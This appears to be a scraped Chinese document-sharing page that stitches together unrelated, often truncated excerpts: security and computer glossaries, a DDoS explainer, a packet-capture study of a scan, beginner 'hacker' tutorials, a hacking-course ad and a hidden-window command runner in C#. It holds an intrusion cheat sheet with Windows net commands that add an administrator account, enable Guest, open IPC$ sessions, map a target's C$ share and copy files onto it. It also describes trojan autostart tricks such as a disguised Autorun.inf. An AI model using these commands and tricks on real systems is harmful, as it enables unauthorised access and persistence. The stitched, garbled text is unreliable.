正面蠕虫是一种在网络中自动发布修补已知安全漏洞补丁的程序。同恶意蠕虫相似,正面蠕虫可以在网络中进行指数级的传输并在用户不知情或不同意的情况下进行执行。它所采用的下载方式是强迫下载。
双面恶魔接入点
就安全而言,双面恶魔接入点是一个自制的无线接入点(热点),伪装成合法的接入点在终端用户不知情的情况下收集个人或企业信息。攻击者只要利用膝上电脑、无线网络和一些常用软件就可以很容易地创建一个双面恶魔接入点。
掠取
在计算机技术中,掠取是指在计算机系统中进行的攻击,特别用来指利用系统向侵入者提供的特定漏洞。作为动词该术语是指成功进行这种攻击的形为。
指数回归算法
指数回归算法用于飞行调整TCP超时值,以便网络设备继续通过已饱和的链接发送数据。
暴露
这是一种不安全的形为,即保密数据直接向未经授权的实体进行公开。
可扩展验证协议(EAP)
这是一种框架,支持可选择的多重PPP验证机制,包括纯文本密码,挑战-响应和任意对话顺序。
外围网关协议(EGP)
向连接到自治系统路由器发布路由选择信息的协议。Unicode漏洞
Unicode漏洞是一个16位的字符集,它可以移植到所有主要的计算机平台并且覆盖几乎整个世界。微软IIS4。0和5。0都存在利用扩展Unicode字符取代“/”和“╲”而能利用“。。/”目录遍历的漏洞。未经授权的用户可能利用IUSR_machinename帐号的上下文空间访问任何以知的文件。该帐号在默认的情况下属于Every-one和Users组的成员,因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问文件都能被删除,修改或执行,就如同一个用户成功登陆所能完成的一样。
六:!!!!
DDOS
"是英文Distributed Denial of Service的缩写,意即""分布式拒绝服务"",DDOS的中文名叫分布式拒绝服务攻击,俗称洪水攻击"
编辑本段DDoS攻击概念
DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使服务器无法处理合法用户的指令。
" DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。单一的DoS攻击一般是采用一对一方式的,当被攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高,它的效果是明显的。随着计算机与网络技术的发展,计算机的处理能力迅速增长,内存大大增加,同时也出现了千兆级别的网络,这使得DoS攻击的困难程度加大了- 目标对恶意攻击包的""消化能力""加强了不少,例如你的攻击软件每秒钟可以发送3,000个攻击包,但我的主机与网络带宽每秒钟可以处理10,000个攻击包,这样一来攻击就不会产生什么效果。"
这时候分布式的拒绝服务攻击手段(DDoS)就应运而生了。你理解了DoS攻击的话,它的原理就很简单。如果说计算机与网络的处理能力加大了10倍,用一台攻击机来攻击不再能起作用的话,攻击者使用10台攻击机同时攻击呢?用100台呢?DDoS就是利用更多的傀儡机来发起进攻,以比从前更大的规模来进攻受害者。
高速广泛连接的网络给大家带来了方便,也为DDoS攻击创造了极为有利的条件。在低速网络时代时,黑客占领攻击用的傀儡机时,总是会优先考虑离目标网络距离近的机器,因为经过路由器的跳数少,效果好。而现在电信骨干节点之间的连接都是以G为级别的,大城市之间更可以达到2.5G的连接,这使得攻击可以从更远的地方或者其他城市发起,攻击者的傀儡机位置可以在分布在更大的范围,选择起来更灵活了。
编辑本段被DDoS攻击时的现象
被攻击主机上有大量等待的TCP连接
网络中充斥着大量的无用的数据包,源地址为假
制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯
利用受害主机提供的服务或传输协议上的缺陷,反复高速的发出特定的服务请求,使受害主机无法及时处理所有正常请求
严重时会造成系统死机
大级别攻击运行原理
如图,一个比较完善的DDoS攻击体系分成四大部分,先来看一下最重要的第2和第3部分:它们分别用做控制和实际发起攻击。请注意控制机与攻击机的区别,对第4部分的
受害者来说,DDoS的实际攻击包是从第3部分攻击傀儡机上发出的,第2部分的控制机只发布命令而不参与实际的攻击。对第2和第3部分计算机,黑客有控制权或者是部分的控制权,并把相应的DDoS程序上传到这些平台上,这些程序与正常的程序一样运行并等待来自黑客的指令,通常它还会利用各种手段隐藏自己不被别人发现。在平时,这些傀儡机器并没有什么异常,只是一旦黑客连接到它们进行控制,并发出指令的时候,攻击傀儡机就成为害人者去发起攻击了。
" 有的朋友也许会问道:""为什么黑客不直接去控制攻击傀儡机,而要从控制傀儡机上转一下呢?""。这就是导致DDoS攻击难以追查的原因之一了。做为攻击者的角度来说,肯定不愿意被捉到,而攻击者使用的傀儡机越多,他实际上提供给受害者的分析依据就越多。在占领一台机器后,高水平的攻击者会首先做两件事:1. 考虑如何留好后门!2. 如何清理日志。这就是擦掉脚印,不让自己做的事被别人查觉到。比较不敬业的黑客会不管三七二十一把日志全都删掉,但这样的话网管员发现日志都没了就会知道有人干了坏事了,顶多无法再从日志发现是谁干的而已。相反,真正的好手会挑有关自己的日志项目删掉,让人看不到异常的情况。这样可以长时间地利用傀儡机。"
但是在第3部分攻击傀儡机上清理日志实在是一项庞大的工程,即使在有很好的日志清理工具的帮助下,黑客也是对这个任务很头痛的。这就导致了有些攻击机弄得不是很干净,通过它上面的线索找到了控制它的上一级计算机,这上级的计算机如果是黑客自己的机器,那么他就会被揪出来了。但如果这是控制用的傀儡机的话,黑客自身还是安全的。控制傀儡机的数目相对很少,一般一台就可以控制几十台攻击机,清理一台计算机的日志对黑客来讲就轻松多了,这样从控制机再找到黑客的可能性也大大降低。
编辑本段黑客是如何组织一次DDoS攻击的?
" 这里用""组织""这个词,是因为DDoS并不象入侵一台主机那样简单。一般来说,黑客进行DDoS攻击时会经过这样的步骤:"
1. 搜集了解目标的情况
下列情况是黑客非常关心的情报:
被攻击目标主机数目、地址情况
目标主机的配置、性能
目标的带宽
对于DDoS攻击者来说,攻击互联网上的某个站点,如https://www.360docs.net/doc/4119032453.html,,有一个重点就是确定到底有多少台主机在支持这个站点,一个大的网站可能有很多台主机利用负载均衡技术提供同一个网站的www服务。以yahoo为例,一般会有下列地址都是提供https://www.360docs.net/doc/4119032453.html, 服务的:
66.218.71.87
66.218.71.88
66.218.71.89
66.218.71.80
66.218.71.81
66.218.71.83
66.218.71.84
66.218.71.86
如果要进行DDoS攻击的话,应该攻击哪一个地址呢?使66.218.71.87这台机器瘫掉,但其他的主机还是能向外提供www服务,所以想让别人访问不到https://www.360docs.net/doc/4119032453.html, 的话,要所有这些IP地址的机器都瘫掉才行。在实际的应用中,一个IP地址往往还代表着数
利用黑客工具进行渗透的数据分析
【经典资料,WORD文档,可编辑修改】 利用黑客工具进行渗透的数据分析 选用工具:X-SCAN 3.3 分析软件:科来网络分析系统2010 beta版 我们知道如果黑客想入侵一个网络,他需要更多的了解一个网络的信息,包括网络拓扑结构,哪些主机在运行,有哪些服务在运行,主机运行的是什么系统,以及该系统主机有没有其他漏洞,和存在一些弱口令等情况等。只有在充分了解了足够多的信息之后,入侵才会变成可能。而黑客入侵之前的扫描是一个比较长时间的工作,同时现象也是比较明显的。我们通过网络分析手段可以很好的把握入侵特征。网络扫描工具很多,比较有名的如国产的冰河和国外的X-scan 等软件。 分析过程 抓包从X-Scan 扫描开始,到扫描结束。抓包后的数据位10M(中间有些数据有其他通信产生)持续时间大概为10分钟。 首先,10分钟产生10M的数据量是不大的,这也就是说单个主机的扫描其实是不占用很多网络带宽的,如图: 上图也反映了一些特征,我们看到,抓包网络内的数据包长只有111.3Byte,这个平均包长是偏小的,而且数据包大小分析发现<=64字节和65-127字节之间的数据占了绝大多少,这就充分说明了网络中有大量的小包存在。 我们接下来看下诊断信息能给我们什么提示, 此外,我们可以从日志选项中查看一些现场,以下是日志的截图: 这种黑客的扫描得出的结果还是很详细和危险的,在不到10分钟之内,就将一个局域网内的各主机的存活,服务,和漏洞情况进行了了解,并且取得了一些效果。例如本次扫描发现一台FTP 服务器的一个账号test 密码为123456 的情况,这种简单的密码和账号最好不要留下,及时的清理。 总结 扫描行为,主要有三种,ICMP扫描用来发现主机存活和拓扑,TCP 用来判断服务和破解,UDP确定一些特定的UDP服务。扫描是入侵的标志,扫描的发现主要是靠平时抓包分析,和日常的维护中进行。最好能够将科来长期部署在网络中,设定一定的报警阀值,例如设置TCP SYN 的阀值和诊断事件的阀值等,此功能是科来2010新功能之一,很好用。 扫描的防御很简单,可以设置防火墙,对ICMP不进行回应,和严格连接,及会话次数限制等。
黑客基础知识
前言:你是不是很想做黑客呢?是不是经常周游于各个黑客站点呢?学黑客是真的很难的!它需要你有足够的耐性!毅力!只有持之以恒才能有所成就!好了~灌了那么多的水,下面就开始吧!注意:本文只适合新手!已入门的请去看别的技术文章吧!下面就用我仅仅知道的知识让你们取得第一次的成功吧!\\操作系统拜托你装个2000的好不好?不要再问为什么了~\\(本文注释用"\\注释内容\\"标记! 第一节课:命令的使用 你必须懂得一些命令才能更好地运用!总不能一边入侵一边去看例文吧!(什么?你喜欢?我晕了~)好了~下面就看看一些常用的命令吧!也就是入侵必须懂得的基本命令!如果你连这都栏得看的话你就可以放学了~放你的长假去吧! https://www.360docs.net/doc/4119032453.html, NET [ ACCOUNTS │COMPUTER │CONFIG │CONTINUE │FILE │GROUP │HELP │ HELPMSG │LOCALGROUP │NAME │PAUSE │PRINT │SEND │SESSION │ SHARE │START │STA TISTICS │STOP │TIME │USE │USER │VIEW ] 上面就是net命令.你可以在cmd下键入net/?获得.我们看看一些常用的. net user \\列举所有用户\\ 例子:c:\>net user net localgroup \\把用户分组\\ 例子:c:\>net localgroup administrators guest /add \\把guest 用户加到管理组.需要有足够的权限才能进行操作!\\ net share \\显示共享资源\\ 例子:c:\>net share net start \\启动服务,或显示已启动服务的列表\\ 例子:\>net start 例子:\>net start telnet \\启动telnet\\ net stop \\停止Windows2000网络服务\\ 例子c:\>net stop telnet \\停止telnet服务\\ net time \\显示时间\\ 例子:c:\>net time 127.0.0.1 \\显示127.0.0.1的时间\\ net use \\显示关于计算机连接的信息\\ 例子:c:\>net use net view \\显示域列表、计算机列表或者由指定计算机共享的资源\\ 例子:c:\>net view net的基本命令就到此结束吧!但并不是说其它的命令不用去学!只是我的基本教学(入侵)
黑客常用八种工具及防御方法
您是怎样看待黑客及黑客现象的?崇拜?不齿?还是畏惧?本文将向您介绍中国黑客常用的八种工具及其防御方法。需要说明的是,这些只是初级黑客、甚至是不算黑客的“黑客”所使用的工具。在真正的黑客看来这些工具是很初级的,但这些黑客工具对我们普通用户的杀伤力却是非常大的,因此有必要介绍一下它们的特点及防御方法。 本文列出了几种有代表性的黑客工具,我们真正要掌握的当然不是如何使用这些黑客工具,而是通过它们了解黑客攻击手段,掌握防范黑客攻击的方法,堵住可能出现的各种漏洞。 冰河 冰河是最优秀的国产木马程序之一,同时也是被使用最多的一种木马。说句心里话,如果这个软件做成规规矩矩的商业用远程控制软件,绝对不会逊于那个体积庞大、操作复杂的PCanywhere,但可惜的是,它最终变成了黑客常用的工具。 冰河的服务器端(被控端)和客户端(控制端)都是一个可执行文件,客户端的图标是一把瑞士军刀,服务器端则看起来是个没什么大不了的微不足道的程序,但就是这个程序,足以让你的电脑成为别人的掌中之物。某台电脑执行了服务器端软件后,该电脑的7626端口(默认)就对外开放了,如果在客户端输入这台电脑的IP地址,就能完全控制这台电脑。由于个人电脑每次上网的IP地址都是随机分配的,所以客户端软件有一个“自动搜索”功能,可以自动扫描某个IP段受感染的电脑,一旦找到,这台电脑就尽在黑客的掌握之中了。由于冰河程序传播比较广泛,所以一般情况下,几分钟之内就能找到一个感染了冰河的受害者。 防御措施:首先不要轻易运行来历不明的软件,只要服务器端不被运行,冰河再厉害也是有力使不出,这一点非常重要;其次由于冰河的广泛流行,使得大多数杀毒软件可以查杀冰河,因此在运行一个新软件之前用杀毒软件查查是很必要的。但由于该软件变种很多,杀毒软件如果不及时升级,难免会有遗漏,因此要保证您使用的杀毒软件病毒库保持最新。用查杀木马软件如木马克星之类的也可以;安装并运行防火墙,如此则能相对安全一些。 Wnuke Wnuke可以利用Windows系统的漏洞, 通过TCP/IP协议向远程机器发送一段信息,导致一个OOB错误,使之崩溃。现象:电脑屏幕上出现一个蓝底白字的提示:“系统出现异常错误”,按ESC键后又回到原来的状态,或者死机。它可以攻击WIN9X、WINNT、WIN2000等系统,并且可以自由设置包的大小和个数,通过连续攻击导致对方死机。 防御措施:不要轻易点击别人在论坛或聊天室告诉您的网址,那很可能是探测您的IP地址的(如Iphunter就可以做到这一点);用写字板或其它的编辑软件建立一个文本文件,文件名为OOBFIX.REG,内容如下: REGEDIT4 [HKEY_LOCAL_MACHINE\System\CurrentControlSet \Services\VxD\MSTCP] ″BSDUrgent″=″0″
名词解释--计算机基础
计算机基础名词解释 1、计算机数据:它们都是由人们编写的二进制数组成的,因为电脑的最低语言是机器语言,它们需要把高级语言改成低级语言,计算机中的数据也是由低级语言构成的; 2、信息技术:信息技术主要指人们获取、存储、传递、处理信息的各种技术,其中通信技术和计算机技术是整个信息技术的核心。 3、操作系统:操作系统是管理计算机系统资源、控制程序执行、改善人机界面和为应用软件提供支持的一种系统软件。dos 、windows、linux都是操作系统。windows和linux是现在最常见的个人电脑操作系统。 4、应用软件:应用软件是指为用户专门开发和设计的,用来解决具体问题的各类程序。 5、ENIAC——电子数字积分计算机 6、CAI——计算机辅助教学 7、CAD——计算机辅助设计 8、CAM——计算机辅助制造 9、CAT——计算机辅助测试 10、ASCII码——美国标准信息交换代码,基本集中包括128个字符与控制符 11、计算机病毒——具有破坏性作用的特制程序 12、黑客——非法入侵他人系统并进行肆意破坏的人 13、硬件——构成计算机的各种物理设备 14、软件——计算机中使用的各种各样的程序及其说明文档(程序和文档) 15、计算机系统——硬件系统和软件系统 16、CPU——中央处理器(微处理器),由运算器、控制器和少量寄存器组成 17、MMX——多媒体指令集 18、CPU的作用——取指令、解释指令和执行指令 19、CPU的指标——字长(指CPU中数据总线的宽度,即一次可并行传递二进制数据的位数)、主频(指CPU时钟频率)、指令处理能力(即每秒处理百万条指令数,以MIPS表示)ROM——只读存储器(PROM、EPROM、EEPROM)Read Only Memory只读存储器其主要特性为只能读出不能写入数据,储存的数据不会因电源中断而消失(属于永久性储存)。一般用来储存系统程序,如个人电系统的BIOS(Basic Input/Output System)。 20、RAM——随机存储器(DRAM、SRAM、SDRAM) 21、RAM (random access memory),随机存取内存其主要特性为可随时读出或写入数据,但 22、电源一中断则所储存之数据即消失,主要用来暂存程序与数据。而RAM又可分成动态内存(Dynamic RAM, DRAM)与静态内存(Static RAM,SRAM)两种。 23、RAM刷新——重写数据或充电 24、CACHE——高速缓冲存储器,介于CPU与内存之间,访问速度最快。为解决CPU与主存储器间速度差而在内存储器和CPU之间增加的一种存取速度远高于普通内存的特殊存储器存取时间——又称存储器访问时间,是指从启动一次存储器操作到完成该操作所经历的时间。 25、存储周期——连续启动两次读操作所需间隔的最小时间。通常存储周期大于存取时间,其单位为NS(纳秒). 26、闪速存储器——在CMOS单晶体管EPROM存储元基础上制造的,实现了电擦除可编程能
C#制作小工具七黑客入侵工具
C#制作小工具七黑客入侵工具 效果图: 刚开始学C#的时候,最大的动力就是想用C#开发出黑客工具啦,很是崇拜黑客,后来渐渐明白,用C#写黑客工具是比较不切合实际的事情,呵呵,你懂得! 代码中封装了一个调用系统资源类,这个不作说明,代码中有,要介绍的是如何用C#模拟CMD命令。 用到的就是两个类,Process和ProcessStartInfo,我们需要的是隐藏着执行CMD命令罢了,呵呵,原来设置下ProcessStartInfo实例化类的属性即可,OK,就这么简单,看代码吧! 核心函数: ///
Process dos = new Process(); //创建进程时使用的一组值,如下面属性 ProcessStartInfo startinfo = new ProcessStartInfo(); //设定需要执行的命令窗口 startinfo.FileName = "cmd.exe"; //隐藏CMD窗口 //设定参数,要输入到命令程序的字符,其中"/c"表示执行完命令后马上退出 startinfo.Arguments = "/c" + dosCommand; //不使用系统外壳程序启动 https://www.360docs.net/doc/4119032453.html,eShellExecute = false; //不重定向输入 startinfo.RedirectStandardInput = false; //重定向输出,而不是默认的显示在DOS控制台上面 startinfo.RedirectStandardOutput = true; //不创建窗口 startinfo.CreateNoWindow = true; dos.StartInfo = startinfo; try { //开始进程 if (dos.Start()) { if (outTime == 0) { dos.WaitForExit(); } else { dos.WaitForExit(outTime); } //读取进程的输出 output = dos.StandardOutput.ReadToEnd(); } } catch (Exception ex) { MessageBox.Show(ex.Message, "错误", MessageBoxButtons.OK, MessageBoxIcon.Error); } finally { if (dos != null)
黑客技术入门教程
你好朋友 百度收索看【紫风剑客黑客入门教程】 是由黑基团队10个黑客高手呕心沥血编写的教程 包括从入门到精通全三套高清视频教程和高手进阶脚本电子书! 全套还包括我们团队全套内部vip黑客工具 工具包包括编,壳,攻,防所有类型的黑客软件! 听说紫风剑客黑客教程都是视频形式的,课程通俗易懂只要会打字就能学会不需要基础,由浅入深, 很火。并且课程的内容会随着技术的更新而更新,因为没有课程终结这个说法。并且他们有YY讲课,有不懂的地方24小时为你服务 学习黑客需要有耐心,要有全套的教程,才可以学会,首先要有视频 讲解,靠个人的参悟是很难学会的,下面了解下学习黑客的步骤: 一、前期 1、了解什么是黑客,黑客的精神是什么。当然了解一下几大着 名黑客或骇客的“发家史”也是很有必要的。 2、黑客必备的一些基础命令,包括DOS命令,以及UNIX / Linux 下的命令。 3、远程扫描、远程刺探技术。包括通过系统自带命令的信息刺 探以及使用工具扫描等。 4、密码破解。了解现在的密码破解的适用范围,以及操作技巧 等等。 5、溢出攻击。溢出工具的使用方法。 6、注入攻击。注入攻击只是一个简称,这里还要包括XSS、旁注 、远程包含等一系列脚本攻击技巧。 7、学会各种编译工具的使用方法,能编译所有ShellCode。 8、学会手动查杀任何木马、病毒,学会分析Windows操作系统, 以使自己百毒不侵。 二、中期 1、学习所有Windows下服务器的搭建步骤(ASP、PHP、JSP)。 2、掌握例如Google黑客、cookies 、网络钓鱼、社会工程学等 等等等。 3、学习HTML、JavaScript、VBScript。 4、学习标准SQL语言,以及大多数数据库的使用。 5、学习ASP,并拥有发掘ASP脚本漏洞的能力。 6、学习PHP,并拥有发掘PHP脚本漏洞的能力。 7、学习JSP,并拥有发掘JSP脚本漏洞的能力。 8、学习掌握最新脚本的特性性以及发掘漏洞的方法,例如眼下 的WEB2.0。 三、后期 1、确定自己的发展方向
黑客常用CMD命令大全
黑客常用CMD命令大全 net user heibai lovechina /add 加一个heibai的用户密码为lovechina net localgroup Administrators heibai /add 把他加入Administrator组 net start telnet 开对方的TELNET服务 net use z:\127.0.0.1c$ 映射对方的C盘 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net user guest /active:yes 将Guest用户激活 net user guest lovechina 把guest的密码改为lovechina net user 用户名/delete 删掉用户 net user guest/time:m-f,08:00-17:00 表示guest用户登录时间为周一至周五的net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表示guest用户登录时间为周一4:00/17:00,周二13:00/15:00,周三至周五8:00/17:00. net user guest/time:all表示没有时间限制. net user guest/time 表示guest用户永远不能登录. 但是只能限制登陆时间,不是上网时间 net time \\127.0.0.1 得到对方的时间, get c:\index.htm d:\ 上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到 127.0.0.1的C盘 net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如:net start telnet,net start schedule) net stop 服务名停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加参数 /yes可取消确认信息net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置
常用黑客工具(网络入侵工具)
常用黑客工具(网络入侵工具) 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011 远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDA V漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制
计算机基础名词解释
计算机基础名词解释 ENIAC——电子数字积分计算机 CAI——计算机辅助教学 CAD——计算机辅助设计CAM——计算机辅助制造 CAT——计算机辅助测试 ASCII码——美国标准信息交换代码,基本集中包括128个字符与控制符 计算机病毒——具有破坏性作用的特制程序 黑客——非法入侵他人系统并进行肆意破坏的人硬件——构成计算机的各种物理设备 软件——计算机中使用的各种各样的程序及其说明文档(程序和文档) 计算机系统——硬件系统和软件系统 CPU——中央处理器(微处理器),由运算器、控制器和少量寄存器组成 MMX——多媒体指令集 CPU的作用——取指令、解释指令和执行指令 CPU的指标——字长(指CPU中数据总线的宽度,即一次可并行传递二进制数据的位数)、主频(指CPU时钟频率)、指令处理能力(即每秒处理百万条指令数,以MIPS表示)ROM——只读存储器(PROM、EPROM、EEPROM)Read Only Memory只读存储器其主要特性为只能读出不能写入数据,储存的数据不会因电源中断而消失(属于永久性储存)。一般用来储存系统程序,如个人电系统的BIOS(Basic Input/Output System)。 RAM——随机存储器(DRAM、SRAM、SDRAM) RAM (random access memory),随机存取内存其主要特性为可随时读出或写入数据,但电源一中断则所储存之数据即消失,主要用来暂存程序与数据。而RAM又可分成动态内存(Dynamic RAM, DRAM)与静态内存(Static RAM,SRAM)两种。 RAM刷新——重写数据或充电 CACHE——高速缓冲存储器,介于CPU与内存之间,访问速度最快。为解决CPU与主存储器间速度差而在内存储器和CPU之间增加的一种存取速度远高于普通内存的特殊存储器 存取时间——又称存储器访问时间,是指从启动一次存储器操作到完成该操作所经历的时间。存储周期——连续启动两次读操作所需间隔的最小时间。通常存储周期大于存取时间,其单位为NS(纳秒). 闪速存储器——在CMOS单晶体管EPROM存储元基础上制造的,实现了电擦除可编程能力 虚拟内存——用硬盘模拟主存从而扩大主存容量 CISC——复杂指令系统计算机 RISC——精简指令系统计算机 指令周期——取出并执行一条指令的时间 接口——CPU与主要外围设备之间通过总线进行连接的逻辑部件,接口起动态连接部件之间的“转换器”作用 中断——指当出现需要时,CPU暂时停止当前程序的执行转而执行处理新情况的程序和执行过程。即在程序运行过程中,系统出现了一个必须由CPU立即处理的情况,此时,CPU暂时中止程序的执行转而处理这个新的情况的过程就叫做中断。 堆栈——是一种后进先出的数据结构,计算机系统处理中断时,使用这个数据结构保护现场。BIOS——基本输入输出系统 CMOS——是一种半导体材料,系统BIOS设置存储器 CD-ROM——只读光驱或光盘 OS——操作系统 DOS——磁盘操作系统(16位字符界面操作系统) PC——个人计算机 MPC——多媒体计算机 总线BUS——公用计算机信息通道,由一组传输导线组成。可分为数据总线、控制总线和地址总线。 ALU——算术/逻辑单元(Arithmetic/Logic Unit,ALU)负责数据信息的加工与处理,包括算
木马攻击常用名词解释
目录 1. IPS IDS IRS (2) 2.攻击 (3) 3. 80端口 (3) 4. 404 (4) 5. Application Firewall (4) 6. SHELL (5) 8. ISP/ICP (8) 9. IIS (9) 10.SQL注入 (9) 11.XSS攻击 (10) 12.DDOS攻击 (11) .
1.IPS IDS IRS 入侵预防系统(IPS: Intrusion Prevention System)是电脑网路安全设施,是对防病毒软体(Antivirus Programs)和防火墙(Packet Filter, Application Gatew ay)的补充。入侵预防系统(Intrusion-prevention system)是一部能够监视网络或网络设备的网络资料传输行为的计算机网络安全设备,能够即时的中断、调整或隔离一些不正常或是具有伤害性的网络资料传输行为。 在ISO/OSI网路层次模型(见OSI模型) 中,防火墙主要在第二到第四层起作用,它的作用在第四到第七层一般很微弱。而除病毒软体主要在第五到第七层起作用。为了弥补防火墙和除病毒软体二者在第四到第五层之间留下的空档,几年前,工业界已经有入侵侦查系统(IDS: Intrusion Detection System)投入使用。入侵侦查系统在发现异常情况后及时向网路安全管理人员或防火墙系统发出警报。可惜这时灾害往往已经形成。虽然,亡羊补牢,尤未为晚,但是,防卫机制最好应该是在危害形成之前先期起作用。随后应运而生的入侵反应系统(IRS: Intrusion Response Systems) 作为对入侵侦查系统的补充能够在发现入侵时,迅速作出反应,并自动采取阻止措施。而入侵预防系统则作为二者的进一步发展,汲取了二者的长处。 入侵预防系统类型 投入使用的入侵预防系统按其用途进一步可以划分为 (HIPS: Hostbased Intrusion Prevension System) 单机入侵预防系统和 (NIPS: Network Intrusion Prevension System)网路入侵预防系统 网路入侵预防系统作为网路之间或网路组成部分之间的独立的硬体设备,切断交通,对过往包裹进行深层检查,然后确定是否放行。网路入侵预防系统藉助病毒特征和协议异常,阻止有害代码传播。有一些网路入侵预防系统还能够跟踪和标记对可疑代码的回答,然后,看谁使用这些回答信息而请求连接,这样就能更好地确认发生了入侵事件。 根据有害代码通常潜伏于正常程序代码中间、伺机运行的特点,单机入侵预防系统监视正常程序,比如Internet Explorer,Outlook,等等,在它们(确切地说,其实是它们所夹带的有害代码)向作业系统发出请求指令,改写系统文件,建立对外连接时,进行有效阻止,从而保护网路中重要的单个机器设备,如伺服器、路由器、防火墙等等。这时,它不需要求助于已知病毒特征和事先设定的安全规则。总地来说,单机入侵预防系统能使大部分钻空子行为无法得逞。我们知道,入侵是指有害代码首先到达目的地,然后干坏事。然而,即使它侥幸突破防火墙等各种防线,得以到达目的地,但是由于有了入侵预防系统,有害代码最终还是无法起到它要起的作用,不能达到它要达到的目的。
黑客必备病毒知识
网络时代可不 太平,谁没有 遭遇过病毒或 木马?从CIH、 I Love You到 红色代码、 Nimda,从 BO到冰河, 无一不是网友 经常懈逅的对 象。怎么避免 这些“艳遇” 是广大用户孜 孜以求的目标, 不过,“道高 一尺,魔高一 丈”,“防” 永远是落后的, 主动消灭它们 才是积极主动 的。 要消灭它们,首先就要掌握病毒及木马是怎么入侵我们的"爱机"的。有关病毒及 木马的入侵招数的文章很多,但都不太全面,编者偶然间发现了一篇作者不详,但内 容颇为全面的文章,特意整理出来,希望对大家有所帮助。 一、修改批处理 很古老的方法,但仍有人使用。一般通过修改下列三个文件来作案: Autoexec.bat(自动批处理,在引导系统时执行)
Winstart.bat(在启动GUI图形界面环境时执行) Dosstart.bat(在进入MS-DOS方式时执行) 例如:编辑C:\\windows\\Dosstart.bat,加入:start Notepad,当你进入“MS-DOS方式”时,就可以看到记事本被启动了。 二、修改系统配置 常使用的方法,通过修改系统配置文件System.ini、Win.ini来达到自动运行的目的,涉及范围有: 在Win.ini文件中: [windows] load=程序名 run=程序名 在System.ini文件中: [boot] shell=Explorer.exe 其中修改System.ini中Shell值的情况要多一些,病毒木马通过修改这里使自己成为Shell,然后加载Explorer.exe,从而达到控制用户电脑的目的。
三、借助自动运行功能 这是黑客最新研发成果,之前该方法不过被发烧的朋友用来修改硬盘的图标而已,如今它被赋予了新的意义,黑客甚至声称这是Windows的新BUG。 Windows的自动运行功能确实很烂,早年许多朋友因为自动运行的光盘中带有 CIH病毒而中招,现在不少软件可以方便地禁止光盘的自动运行,但硬盘呢?其实硬盘也支持自动运行,你可尝试在D盘根目录下新建一个Autorun.inf,用记事本打开它,输入如下内容: [autorun] open=Notepad.exe 保存后进入“我的电脑”,按F5键刷新一下,然后双击D盘盘符,怎么样?记事 本打开了,而D盘却没有打开。 当然,以上只是一个简单的实例,黑客做得要精密很多,他们会把程序改名为“.exe”(不是空格,而是中文的全角空格,这样在Autorun.inf中只会看到“open=”而被忽略,此种行径在修改系统配置时也常使用,如“run=”;为了更好地隐藏自己,其程序运行后,还会替你打开硬盘,让你难以查觉。 由此可以推想,如果你打开了D盘的共享,黑客就可以将木马和一个Autorun.inf 存入该分区,当Windows自动刷新时,你也就“中奖”了,因此,大家千万不要共享任何根目录,当然更不能共享系统分区(一般为C:)。 四、通过注册表中的Run来启动
黑客工具包大全
黑客工具包大全 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDAV漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy 